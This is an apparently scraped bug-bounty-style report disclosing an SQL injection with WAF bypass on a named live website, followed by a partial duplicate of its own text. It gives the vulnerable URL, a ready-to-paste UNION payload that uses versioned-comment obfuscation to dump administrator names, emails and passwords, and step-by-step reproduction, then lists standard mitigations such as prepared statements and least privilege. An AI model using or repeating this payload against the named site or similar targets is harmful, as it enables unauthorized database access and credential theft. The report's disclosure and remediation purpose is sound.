Bug Report

BUG REPORT
From : pab412183
Title : SQL Injection Vulnerability with WAF Bypass
Severity : High
Description : This bug report highlights a critical SQL Injection (SQLi)

vulnerability in this website, which can be exploited to bypass the Web
Application Firewall (WAF) and gain unauthorized access to the
database. SQLi attacks can lead to data breaches, unauthorized data
manipulation, and potential system compromise.
WAF Bypass :-
A Web Application Firewall (WAF) is a security tool that sits between a

web application and the internet, filtering out malicious traffic. WAFs are
designed to detect and block common web application attacks, including
SQLi.
However, WAFs can be bypassed by attackers using various techniques,

including encoding, obfuscation, and evasion. For example, an attacker
may use hex encoding to bypass a WAF's signature-based detection.
To prevent WAF bypass, developers should ensure that their WAF rules
are up-to-date and comprehensive. Additionally, they can implement
additional security measures such as rate limiting, IP blocking, and
user-agent filtering.
Vulnerable URL :- https://longlife.com.pk/categories.php?id=2

Payloads :- https://longlife.com.pk/categories.php?id=@2 /*!50000Union*/
Select 1,/*!50000concat*/(name,0x3d,email,0x3d,password),3,4,5,6
/*!50000from*/ administrators--+
[ Copy that full url written in Payloads section and paste it in your
browser to see how critical it is ]
Step of reproduce :-
1. Open this url in your browser (use firefox/cyberfox to avoid issues)

(https://longlife.com.pk/categories.php?id=2)
2. Then put an single cote (‘) after the parameter value . (.php?id=2’)
like this.
3. You will a change in your site .Notice that all of your content’s are
gone. Not actually gone it’s hidden because this site contains
(Error Based SQLI). You can learn from that embedded link and
from free recourses on online how it’s works.
4. Use this payload that i made and able to exploit SQLI on your
website .
(https://longlife.com.pk/categories.php?id=@2 /*!50000Union*/ Select

1,/*!50000concat*/(name,0x3d,email,0x3d,password),3,4,5,6
/*!50000from*/ administrators--+)
5. As you can see it brakes through the (WAF) and able to dump data
from backend database .
6. You can see after using that dios we dumped username,email and
password .we can also use Burpsuit and other automated tools to
do the same thing but i did it manually.
Mitigation :
1. Use Prepared Statements (Parameterized Queries):

● Utilize prepared statements or parameterized queries provided by
your programming language or framework. These mechanisms
automatically handle input validation and escaping, making it
difficult for attackers to inject malicious SQL.
Example (in PHP using PDO):
[ $stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username");

$stmt->bindParam(':username', $username);
$stmt->execute(); ]
2. Input Validation:
● Implement strict input validation on user inputs. Only allow
expected characters and values, and reject anything that doesn't
adhere to your predefined rules.
3. Escape User Input:

● If you cannot use prepared statements for some reason, ensure
that user input is properly escaped before being included in SQL
queries. Use appropriate functions or libraries to escape data,
depending on your programming language and database.
4. Least Privilege Principle:

● Limit the database user's permissions to the minimum necessary
for your application. Avoid using overly privileged accounts.
5. Error Handling:
● Customize error messages so that they don't reveal sensitive
information about the database structure. Display generic error
messages to users and log detailed errors for administrators.
Remember that SQL injection is just one of many security risks web
applications can face. Implementing a robust security strategy involves
multiple layers of defense, including input validation, secure coding practices,
and ongoing monitoring and testing for vulnerabilities.
POC (proof of concept):-
1.
2.
3.

Bug Report

Uploaded by

Bug Report

Uploaded by

BUG REPORT

Title : SQL Injection Vulnerability with WAF Bypass

Description : This bug report highlights a critical SQL Injection (SQLi)

A Web Application Firewall (WAF) is a security tool that sits between a

However, WAFs can be bypassed by attackers using various techniques,

Vulnerable URL :- https://longlife.com.pk/categories.php?id=2

1. Open this url in your browser (use firefox/cyberfox to avoid issues)

(https://longlife.com.pk/categories.php?id=@2 /!50000Union/ Select

1. Use Prepared Statements (Parameterized Queries):

Example (in PHP using PDO):

[ $stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username");

3. Escape User Input:

4. Least Privilege Principle:

You might also like